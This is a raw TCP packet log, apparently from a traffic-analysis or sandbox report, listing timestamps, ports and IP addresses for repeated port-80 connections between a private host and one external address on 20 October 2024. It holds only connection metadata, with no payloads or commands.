Oct 20, 2024 15:25:18.182523012 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.182600021 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.226483107 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:18.226594925 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:18.274451971 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:19.288882971 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.164251089 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.164383888 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.164480925 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.169332981 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.274940014 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.279993057 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.280081987 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.280168056 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.280255079 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285012007 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.285068035 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285115004 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.285150051 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.285170078 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285207987 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285226107 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.285268068 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.285276890 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285320997 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285331011 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.285383940 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.285996914 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.286022902 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.286046028 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.286056042 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.286072969 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.286093950 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.289730072 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.289783001 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.289997101 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.290051937 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.290196896 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.290229082 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.290251017 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.290283918 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.290354013 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.290400982 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.290405035 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.290448904 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.290452003 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.290503979 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.334374905 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.334636927 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:20.382381916 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:20.936239004 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:21.928859949 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:21.929056883 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:21.929058075 CEST	49738	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:21.934267044 CEST	80	49738	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.040307045 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.045310974 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.045425892 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.045547962 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.045614958 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050525904 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050594091 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050709963 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050754070 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050781965 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050785065 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050806999 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050826073 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050833941 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050860882 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050888062 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050903082 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050929070 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050961018 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.050961971 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.050988913 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.051016092 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.055283070 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.055351973 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.055454969 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.055521011 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.055752993 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.055818081 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.055859089 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.055886030 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.055921078 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.055947065 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.055954933 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.056016922 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.056025028 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.056085110 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.098464966 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.098674059 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:22.150417089 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:22.658735037 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.562832117 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.562913895 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.562983990 CEST	49741	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.567934990 CEST	80	49741	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.665628910 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.670573950 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.670694113 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.675051928 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.675156116 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680167913 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680200100 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680222034 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680227995 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680250883 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680272102 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680291891 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680311918 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680321932 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680340052 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680380106 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680404902 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680486917 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680516005 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.680546999 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.680561066 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.684783936 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.684813023 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.684849024 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.684873104 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.685225010 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.685277939 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.685280085 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.685308933 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.685368061 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.685406923 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.685441017 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.685447931 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.685470104 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.685532093 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.730556965 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:23.733683109 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:23.786624908 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:24.286381006 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:25.159400940 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:25.159665108 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:25.167244911 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:25.167332888 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.368588924 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.373635054 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.373716116 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.373847961 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.373910904 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.378798008 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.378861904 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379311085 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379340887 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379407883 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379435062 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379462957 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379489899 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.379519939 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.383563042 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.384248972 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.384293079 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:26.389656067 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.389775991 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.389803886 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.389836073 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.389863014 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.389910936 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.389940977 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:26.430372953 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.826060057 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.826251984 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.826349974 CEST	49748	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.831186056 CEST	80	49748	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.930977106 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.936254978 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.936357975 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.936445951 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.936491013 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.941411972 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941443920 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941483021 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.941505909 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.941529989 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941559076 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941603899 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941622019 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.941632032 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941654921 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.941680908 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.941731930 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941759109 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941786051 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.941795111 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:27.946069002 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.946544886 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.946806908 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.946835041 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.946930885 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.946957111 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.946984053 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:27.990339041 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.449042082 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.449126959 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.449202061 CEST	49750	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.454062939 CEST	80	49750	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.556354046 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.561393976 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.561506033 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.561624050 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.561682940 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566493988 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566575050 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566581011 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566652060 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566654921 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566684008 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566709042 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566710949 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566737890 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566760063 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566765070 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566800117 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566812992 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566862106 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:29.566865921 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.566909075 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.571234941 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.571479082 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.571671009 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.571944952 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.571973085 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.572022915 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.572050095 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:29.618447065 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:30.985275984 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:30.985359907 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:30.985416889 CEST	49752	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:30.990245104 CEST	80	49752	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.087312937 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.092257023 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.092331886 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.092425108 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.092468977 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097276926 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097306967 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097341061 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097364902 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097368956 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097398996 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097425938 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097426891 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097449064 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097455025 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097482920 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097505093 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097527027 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097554922 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097584963 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:31.097584963 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.097614050 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102492094 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102526903 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102557898 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102586031 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102634907 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102662086 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.102689028 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:31.150429010 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.634339094 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.634599924 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.634681940 CEST	49754	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.639571905 CEST	80	49754	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.746866941 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.751811028 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.751907110 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.754556894 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.754621029 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.759589911 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759619951 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759661913 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.759673119 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759701967 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759706020 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.759752989 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.759771109 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759804964 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759823084 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.759860992 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.759872913 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.759927034 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:32.764353037 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764380932 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764411926 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764529943 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764650106 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764889956 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764916897 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.764981985 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.765008926 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:32.810388088 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.042680025 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.042772055 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.042875051 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.047666073 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.149847984 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.154910088 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.155000925 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.155106068 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.155153036 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.159898043 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.159965992 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.159997940 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160049915 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160073996 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.160079002 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160111904 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160131931 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.160166025 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160186052 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.160193920 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160244942 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.160244942 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:34.160273075 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.164654970 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.165091991 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.165127039 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.165194035 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.165226936 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.165283918 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.165311098 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:34.206729889 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.613351107 CEST	80	49756	193.46.218.44	192.168.2.4
Oct 20, 2024 15:25:35.613559961 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.613779068 CEST	49756	80	192.168.2.4	193.46.218.44
Oct 20, 2024 15:25:35.618664980 CEST	80	49756	193.46.218.44	192.168.2.4
